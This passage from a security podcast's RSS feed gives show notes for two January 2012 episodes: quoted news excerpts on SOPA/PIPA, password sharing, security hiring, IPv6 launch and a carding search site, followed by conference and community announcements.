<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just hours after Senator Harry Reid (D-NV) announced he was delaying a vote on the PROTECT IP Act, Rep. Lamar Smith (R-TX), the sponsor of the Stop Online Piracy Act, followed suit and announced he would be delaying consideration of the companion legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I have heard from the critics and I take seriously their concerns regarding proposed legislation to address the problem of online piracy,&quot; Smith said. &quot;It is clear that we need to revisit the approach on how best to address the problem of foreign thieves that steal and sell American inventions and products.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Committee will continue work with both copyright owners and Internet companies to develop proposals that combat online piracy and protect America&rsquo;s intellectual property,&quot; Smith continued. &quot;We welcome input from all organizations and individuals who have an honest difference of opinion about how best to address this widespread problem.&quot; (He may want to check out our thoughts on the matter.)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even former Senator Chris Dodd, the head of the Motion Picture Association of America, seemed to concede defeat. &quot;With today&rsquo;s announcement, we hope the dynamics of the conversation can change and become a sincere discussion about how best to protect the millions of American jobs affected by the theft of American intellectual property,&quot; he said in a statement. &quot;It is incumbent that they now sincerely work with all of us to achieve a meaningful solution to this critically important goal.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.nytimes.com/2012/01/18/us/teenagers-sharing-passwords-as-show-of-affection.html?_r=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nytimes.com/2012/01/18/us/teenagers-sharing-passwords-as-show-of-affection.html?_r=1</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Young couples have long signaled their devotion to each other by various means &mdash; the gift of a letterman jacket, or an exchange of class rings or ID bracelets. Best friends share locker combinations. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The digital era has given rise to a more intimate custom. It has become fashionable for young people to express their affection for each other by sharing their passwords to e-mail, Facebook and other accounts. Boyfriends and girlfriends sometimes even create identical passwords, and let each other read their private e-mails and texts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They say they know such digital entanglements are risky, because a souring relationship can lead to people using online secrets against each other. But that, they say, is part of what makes the symbolism of the shared password so powerful.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.networkworld.com/community/node/79602"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/community/node/79602</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like other analyst firms, ESG conducts research on IT Spending Intentions annually. One of the things we track is IT hiring plans in all areas including IT security.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 35% of all mid-market and enterprise organizations planned on hiring security staff</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 22% believed they had a &ldquo;problematic shortage&rdquo; of security skills at their organizations</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The situation has not improved at all over the past year. In 2012:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 39% of mid-market and enterprise organizations plan on hiring security staff</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull; 23% believe they have a &ldquo;problematic shortage&rdquo; of security skills in their organization</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/business/news/2012/01/world-ipv6-launch-this-time-its-for-real.ars"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/business/news/2012/01/world-ipv6-launch-this-time-its-for-real.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As happened during last year&#39;s World IPv6 Day, the Internet Society is taking the lead in organizing World IPv6 Launch on June 6, 2012. (Yes, right on the heels of the Venus transit across the disk of the sun.) But unlike last year, after turning on the new version of the Internet Protocol on some of the largest Web properties&mdash;and many smaller ones&mdash;this year, IPv6 will </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> be turned off again 24 hours later. So &quot;this time it&#39;s for real,&quot; and the new protocol will be here to stay at Google, Yahoo, Bing, Facebook, and Cisco, as well as many Akamai and Limelight customers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also new this year is that several Internet service providers will be participating by enabling IPv6 for at least one percent of their customers&mdash;with more to follow. These ISPs include not only those that have already put a toe in the IPv6 waters before, such as Comcast, Free Telecom in France, and XS4ALL in the Netherlands; but also Time Warner Cable and AT&amp;T. Last but not least, Cisco/Linksys and D-Link will be enabling IPv6 support in the default configurations of their home routers.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://krebsonsecurity.com/2012/01/megasearch-aims-to-index-fraud-site-wares/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://krebsonsecurity.com/2012/01/megasearch-aims-to-index-fraud-site-wares/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new service aims to be the Google search of underground Web sites, connecting buyers to a vast sea of shops that offer an array of dodgy goods and services, from stolen credit card numbers to identity information and anonymity tools.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A glut of data breaches and stolen card numbers has spawned dozens of stores that sell the information. The trouble is that each shop requires users to create accounts and sign in before they can search for cards.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enter MegaSearch.cc, which lets potential buyers discover which fraud shops hold the cards they&rsquo;re looking for without having to first create accounts at each store. This free search engine aggregates data about compromised payment cards, and points searchers to various fraud shops selling them.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3402/0/infosec-daily-podcast-episode-573.mp3" length="20215477" type="audio/mpeg" />
		<itunes:duration>0:42:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go t[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 572 &#8211; Carrier IQ, Koobface, DNSViz, Obligatory Lawsuit, Source Code Swipe, &amp; DoJ Tango Down</title>
		<link>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down</link>
		<comments>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down#comments</comments>
		<pubDate>Fri, 20 Jan 2012 01:56:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3395</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 572 for January 19, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (New Update!)</span><br />
	<a href="http://www.social-engineer.org/bradsmithdonation"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
